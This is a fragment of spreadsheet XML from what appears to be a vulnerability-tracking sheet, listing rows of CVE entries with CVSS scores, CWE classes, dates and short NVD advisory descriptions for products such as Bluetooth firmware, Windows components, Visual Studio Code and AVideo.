t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q793" s="5" t="inlineStr" /><c r="R793" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S793" s="5" t="inlineStr"><is><t>A heap overflow in the a2dp_decoder_sbc.cpp component of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T793" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79377</t></is></c></row><row r="794"><c r="A794" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B794" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C794" s="5" t="inlineStr"><is><t>CVE-2026-79378</t></is></c><c r="D794" s="5" t="n"><v>7.5</v></c><c r="E794" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F794" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G794" s="5" t="inlineStr" /><c r="H794" s="5" t="n"><v>0.004</v></c><c r="I794" s="5" t="inlineStr" /><c r="J794" s="5" t="inlineStr" /><c r="K794" s="5" t="inlineStr" /><c r="L794" s="5" t="inlineStr" /><c r="M794" s="5" t="inlineStr" /><c r="N794" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O794" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P794" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q794" s="5" t="inlineStr" /><c r="R794" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S794" s="5" t="inlineStr"><is><t>An issue in the btm_acl_handle() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T794" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79378</t></is></c></row><row r="795"><c r="A795" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B795" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C795" s="5" t="inlineStr"><is><t>CVE-2026-79572</t></is></c><c r="D795" s="5" t="n"><v>7.5</v></c><c r="E795" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F795" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G795" s="5" t="inlineStr" /><c r="H795" s="5" t="n"><v>0.003</v></c><c r="I795" s="5" t="inlineStr" /><c r="J795" s="5" t="inlineStr" /><c r="K795" s="5" t="inlineStr" /><c r="L795" s="5" t="inlineStr" /><c r="M795" s="5" t="inlineStr" /><c r="N795" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O795" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P795" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q795" s="5" t="inlineStr" /><c r="R795" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S795" s="5" t="inlineStr"><is><t>An XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload.</t></is></c><c r="T795" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79572</t></is></c></row><row r="796"><c r="A796" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B796" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C796" s="5" t="inlineStr"><is><t>CVE-2026-79575</t></is></c><c r="D796" s="5" t="n"><v>7.5</v></c><c r="E796" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F796" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G796" s="5" t="inlineStr" /><c r="H796" s="5" t="n"><v>0.002</v></c><c r="I796" s="5" t="inlineStr" /><c r="J796" s="5" t="inlineStr" /><c r="K796" s="5" t="inlineStr" /><c r="L796" s="5" t="inlineStr" /><c r="M796" s="5" t="inlineStr" /><c r="N796" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O796" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P796" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q796" s="5" t="inlineStr" /><c r="R796" s="5" t="inlineStr"><is><t>CWE-330</t></is></c><c r="S796" s="5" t="inlineStr"><is><t>The JWT signing secret in yfexam-exam v2.0 is derived from the username and the current month instead of a random server-side key, making the secret key easily obtainable via a bruteforce attack.</t></is></c><c r="T796" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79575</t></is></c></row><row r="797"><c r="A797" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B797" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C797" s="5" t="inlineStr"><is><t>CVE-2026-81355</t></is></c><c r="D797" s="5" t="n"><v>7.5</v></c><c r="E797" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F797" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G797" s="5" t="inlineStr" /><c r="H797" s="5" t="n"><v>0.002</v></c><c r="I797" s="5" t="inlineStr" /><c r="J797" s="5" t="inlineStr" /><c r="K797" s="5" t="inlineStr" /><c r="L797" s="5" t="inlineStr" /><c r="M797" s="5" t="inlineStr" /><c r="N797" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O797" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P797" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q797" s="5" t="inlineStr" /><c r="R797" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S797" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to execute code locally.</t></is></c><c r="T797" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81355</t></is></c></row><row r="798"><c r="A798" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B798" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C798" s="5" t="inlineStr"><is><t>CVE-2026-81381</t></is></c><c r="D798" s="5" t="n"><v>7.5</v></c><c r="E798" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F798" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G798" s="5" t="inlineStr" /><c r="H798" s="5" t="n"><v>0.006</v></c><c r="I798" s="5" t="inlineStr" /><c r="J798" s="5" t="inlineStr" /><c r="K798" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L798" s="5" t="inlineStr" /><c r="M798" s="5" t="inlineStr" /><c r="N798" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O798" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P798" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q798" s="5" t="inlineStr" /><c r="R798" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S798" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T798" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81381</t></is></c></row><row r="799"><c r="A799" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B799" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C799" s="5" t="inlineStr"><is><t>CVE-2026-81790</t></is></c><c r="D799" s="5" t="n"><v>7.5</v></c><c r="E799" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F799" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G799" s="5" t="inlineStr" /><c r="H799" s="5" t="n"><v>0.003</v></c><c r="I799" s="5" t="inlineStr" /><c r="J799" s="5" t="inlineStr" /><c r="K799" s="5" t="inlineStr" /><c r="L799" s="5" t="inlineStr" /><c r="M799" s="5" t="inlineStr" /><c r="N799" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O799" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P799" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q799" s="5" t="inlineStr" /><c r="R799" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S799" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Viszt Péter Csomagpontok és szállítási címkék WooCommerce-hez allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Csomagpontok és szállítási címkék WooCommerce-hez: from n/a before 4.2.8.</t></is></c><c r="T799" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81790</t></is></c></row><row r="800"><c r="A800" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B800" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C800" s="5" t="inlineStr"><is><t>CVE-2026-83989</t></is></c><c r="D800" s="5" t="n"><v>7.5</v></c><c r="E800" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F800" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G800" s="5" t="inlineStr" /><c r="H800" s="5" t="n"><v>0.008999999999999999</v></c><c r="I800" s="5" t="inlineStr" /><c r="J800" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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00" s="5" t="inlineStr" /><c r="M800" s="5" t="inlineStr" /><c r="N800" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O800" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P800" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q800" s="5" t="inlineStr" /><c r="R800" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S800" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T800" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t></is></c></row><row r="801"><c r="A801" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B801" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C801" s="5" t="inlineStr"><is><t>CVE-2026-84001</t></is></c><c r="D801" s="5" t="n"><v>7.5</v></c><c r="E801" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F801" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G801" s="5" t="inlineStr" /><c r="H801" s="5" t="n"><v>0.006</v></c><c r="I801" s="5" t="inlineStr" /><c r="J801" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K80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01" s="5" t="inlineStr" /><c r="M801" s="5" t="inlineStr" /><c r="N801" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O801" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P801" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q801" s="5" t="inlineStr" /><c r="R801" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S801" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T801" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t></is></c></row><row r="802"><c r="A802" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B802" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C802" s="5" t="inlineStr"><is><t>CVE-2026-85400</t></is></c><c r="D802" s="5" t="n"><v>7.5</v></c><c r="E802" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F802" s="5" t="inlineStr"><is><t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t></is></c><c r="G802" s="5" t="inlineStr" /><c r="H802" s="5" t="n"><v>0.004</v></c><c r="I802" s="5" t="inlineStr" /><c r="J802" s="5" t="inlineStr" /><c r="K802" s="5" t="inlineStr" /><c r="L802" s="5" t="inlineStr" /><c r="M802" s="5" t="inlineStr" /><c r="N802" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O802" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P802" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q802" s="5" t="inlineStr" /><c r="R802" s="5" t="inlineStr"><is><t>CWE-266, CWE-862</t></is></c><c r="S802" s="5" t="inlineStr"><is><t>Backend administrators without system maintainer privileges were able to schedule any of the configuration:read, configuration:set, and configuration:show commands. This allowed them to modify arbitrary system configuration, which is normally limited to system maintainers. As a consequence, this allowed them, for example, to gain system maintainer privileges or cause a denial of service. Exploiting this vulnerability requires an administrator-level backend user account. This issue affects TYPO3 CMS versions 14.2.0-14.3.6.</t></is></c><c r="T802" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85400</t></is></c></row><row r="803"><c r="A803" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B803" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C803" s="5" t="inlineStr"><is><t>CVE-2026-86075</t></is></c><c r="D803" s="5" t="n"><v>7.5</v></c><c r="E803" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F803" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G803" s="5" t="inlineStr" /><c r="H803" s="5" t="n"><v>0.003</v></c><c r="I803" s="5" t="inlineStr" /><c r="J803" s="5" t="inlineStr" /><c r="K803" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L803" s="5" t="inlineStr" /><c r="M803" s="5" t="inlineStr" /><c r="N803" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O803" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P803" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q803" s="5" t="inlineStr" /><c r="R803" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S803" s="5" t="inlineStr"><is><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is></c><c r="T803" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86075</t></is></c></row><row r="804"><c r="A804" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B804" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C804" s="5" t="inlineStr"><is><t>CVE-2026-86711</t></is></c><c r="D804" s="5" t="n"><v>7.5</v></c><c r="E804" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F804" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G804" s="5" t="inlineStr" /><c r="H804" s="5" t="n"><v>0.001</v></c><c r="I804" s="5" t="inlineStr" /><c r="J804" s="5" t="inlineStr" /><c r="K804" s="5" t="inlineStr" /><c r="L804" s="5" t="inlineStr" /><c r="M804" s="5" t="inlineStr" /><c r="N804" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O804" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P804" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q804" s="5" t="inlineStr" /><c r="R804" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S804" s="5" t="inlineStr"><is><t>electerm before 5.3.15 exposes 40+ main-process functions through an unvalidated Electron IPC handler with no function-name allowlist or sender validation. Renderer-side script execution can invoke openFileWithEditor and other functions with arbitrary arguments to execute system commands in the main process.</t></is></c><c r="T804" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86711</t></is></c></row><row r="805"><c r="A805" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B805" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C805" s="5" t="inlineStr"><is><t>CVE-2026-86721</t></is></c><c r="D805" s="5" t="n"><v>7.5</v></c><c r="E805" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F805" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G805" s="5" t="inlineStr" /><c r="H805" s="5" t="n"><v>0.003</v></c><c r="I805" s="5" t="inlineStr" /><c r="J805" s="5" t="inlineStr" /><c r="K805" s="5" t="inlineStr" /><c r="L805" s="5" t="inlineStr" /><c r="M805" s="5" t="inlineStr" /><c r="N805" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O805" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P805" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q805" s="5" t="inlineStr" /><c r="R805" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S805" s="5" t="inlineStr"><is><t>AVideo through commit c3edcc274c contains an authorization bypass vulnerability where a session cookie named 'key' with value 'value' overrides the $_REQUEST['key'] parameter in saveLive.php and related endpoints. Attackers can publish to any user's RTMP stream without authentication by using the known constant stream key value to hijack live broadcasts.</t></is></c><c r="T805" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86721</t></is></c></row><row r="806"><c r="A806" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B806" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C806" s="5" t="inlineStr"><is><t>CVE-2026-86728</t></is></c><c r="D806" s="5" t="n"><v>7.5</v></c><c r="E806" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F806" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G806" s="5" t="inlineStr" /><c r="H806" s="5" t="n"><v>0.003</v></c><c r="I806" s="5" t="inlineStr" /><c r="J806" s="5" t="inlineStr" /><c r="K806" s="5" t="inlineStr" /><c r="L806" s="5" t="inlineStr" /><c r="M806" s="5" t="inlineStr" /><c r="N806" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O806" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P806" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q806" s="5" t="inlineStr" /><c r="R806" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S806" s="5" t="inlineStr"><is><t>AVideo through 29.0 contains an authentication bypass vulnerability in plugin/PlayLists/epg.json.php that exposes live-stream keys and private EPG schedules to unauthenticated users. Attackers can request the endpoint with sequential user or playlist IDs to retrieve sensitive credentials, server identifiers, and complete programme schedules without authentication.</t></is></c><c r="T806" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86728</t></is></c></row><row r="807"><c r="A807" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B807" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C807" s="5" t="inlineStr"><is><t>CVE-2026-19651</t></is></c><c r="D807" s="5" t="n"><v>7.4</v></c><c r="E807" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F807" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G807" s="5" t="inlineStr" /><c r="H807" s="5" t="n"><v>0.003</v></c><c r="I807" s="5" t="inlineStr" /><c r="J807" s="5" t="inlineStr" /><c r="K807" s="5" t="inlineStr" /><c r="L807" s="5" t="inlineStr" /><c r="M807" s="5" t="inlineStr" /><c r="N807" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O807" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P807" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q807" s="5" t="inlineStr" /><c r="R807" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S807" s="5" t="inlineStr"><is><t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t></is></c><c r="T807" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t></is></c></row><row r="808"><c r="A808" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B808" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C808" s="5" t="inlineStr"><is><t>CVE-2026-69347</t></is></c><c r="D808" s="5" t="n"><v>7.4</v></c><c r="E808" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F808" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G808" s="5" t="inlineStr" /><c r="H808" s="5" t="n"><v>0.003</v></c><c r="I808" s="5" t="inlineStr" /><c r="J808" s="5" t="inlineStr" /><c r="K808" s="5" t="inlineStr" /><c r="L808" s="5" t="inlineStr" /><c r="M808" s="5" t="inlineStr" /><c r="N808" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O808" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P808" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q808" s="5" t="inlineStr" /><c r="R808" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S808" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T808" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t></is></c></row><row r="809"><c r="A809" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B809" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C809" s="5" t="inlineStr"><is><t>CVE-2026-71375</t></is></c><c r="D809" s="5" t="n"><v>7.4</v></c><c r="E809" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F809" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G809" s="5" t="inlineStr" /><c r="H809" s="5" t="n"><v>0.002</v></c><c r="I809" s="5" t="inlineStr" /><c r="J809" s="5" t="inlineStr" /><c r="K809" s="5" t="inlineStr" /><c r="L809" s="5" t="inlineStr" /><c r="M809" s="5" t="inlineStr" /><c r="N809" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O809" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P809" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q809" s="5" t="inlineStr" /><c r="R809" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S809" s="5" t="inlineStr"><is><t>Improper restriction of XML external entity reference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is></c><c r="T809" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71375</t></is></c></row><row r="810"><c r="A810" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B810" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C810" s="5" t="inlineStr"><is><t>CVE-2026-76196</t></is></c><c r="D810" s="5" t="n"><v>7.4</v></c><c r="E810" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F810" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G810" s="5" t="inlineStr" /><c r="H810" s="5" t="n"><v>0.002</v></c><c r="I810" s="5" t="inlineStr" /><c r="J810" s="5" t="inlineStr" /><c r="K810" s="5" t="inlineStr"><is><t>adobe:photoshop_mobile</t></is></c><c r="L810" s="5" t="inlineStr" /><c r="M810" s="5" t="inlineStr" /><c r="N810" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O810" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P810" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q810" s="5" t="inlineStr" /><c r="R810" s="5" t="inlineStr"><is><t>CWE-384</t></is></c><c r="S810" s="5" t="inlineStr"><is><t>Photoshop Mobile is affected by a Session Fixation vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain access to sensitive resources. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must interact with a malicious webpage. Scope is changed.</t></is></c><c r="T810" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76196</t></is></c></row><row r="811"><c r="A811" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B811" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C811" s="5" t="inlineStr"><is><t>CVE-2026-78461</t></is></c><c r="D811" s="5" t="n"><v>7.4</v></c><c r="E811" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F811" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G811" s="5" t="inlineStr" /><c r="H811" s="5" t="n"><v>0.01</v></c><c r="I811" s="5" t="inlineStr" /><c r="J811" s="5" t="inlineStr" /><c r="K811" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L811" s="5" t="inlineStr" /><c r="M811" s="5" t="inlineStr" /><c r="N811" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O811" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P811" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q811" s="5" t="inlineStr" /><c r="R811" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S811" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T811" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t></is></c></row><row r="812"><c r="A812" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B812" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C812" s="5" t="inlineStr"><is><t>CVE-2026-81383</t></is></c><c r="D812" s="5" t="n"><v>7.4</v></c><c r="E812" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F812" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G812" s="5" t="inlineStr" /><c r="H812" s="5" t="n"><v>0.007</v></c><c r="I812" s="5" t="inlineStr" /><c r="J812" s="5" t="inlineStr" /><c r="K812" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L812" s="5" t="inlineStr" /><c r="M812" s="5" t="inlineStr" /><c r="N812" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O812" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P812" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q812" s="5" t="inlineStr" /><c r="R812" s="5" t="inlineStr"><is><t>CWE-706</t></is></c><c r="S812" s="5" t="inlineStr"><is><t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T812" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t></is></c></row><row r="813"><c r="A813" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B813" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C813" s="5" t="inlineStr"><is><t>CVE-2026-84003</t></is></c><c r="D813" s="5" t="n"><v>7.4</v></c><c r="E813" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F813" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G813" s="5" t="inlineStr" /><c r="H813" s="5" t="n"><v>0.004</v></c><c r="I813" s="5" t="inlineStr" /><c r="J813" s="5" t="inlineStr" /><c r="K813" s="5" t="inlineStr"><is><t>microsoft:azure\/msal-node</t></is></c><c r="L813" s="5" t="inlineStr" /><c r="M813" s="5" t="inlineStr" /><c r="N813" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O813" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P813" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q813" s="5" t="inlineStr" /><c r="R813" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S813" s="5" t="inlineStr"><is><t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T813" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t></is></c></row><row r="814"><c r="A814" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B814" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C814" s="5" t="inlineStr"><is><t>CVE-2026-28613</t></is></c><c r="D814" s="5" t="n"><v>7.3</v></c><c r="E814" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F814" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G814" s="5" t="inlineStr" /><c r="H814" s="5" t="n"><v>0.001</v></c><c r="I814" s="5" t="inlineStr" /><c r="J814" s="5" t="inlineStr" /><c r="K814" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L814" s="5" t="inlineStr" /><c r="M814" s="5" t="inlineStr" /><c r="N814" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O814" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P814" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q814" s="5" t="inlineStr" /><c r="R814" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S814" s="5" t="inlineStr"><is><t>In initAppLinkTypeAndIntent of ChannelImpl.java, there is a possible launch an arbitrary intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T814" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t></is></c></row><row r="815"><c r="A815" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B815" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C815" s="5" t="inlineStr"><is><t>CVE-2026-28626</t></is></c><c r="D815" s="5" t="n"><v>7.3</v></c><c r="E815" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F815" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G815" s="5" 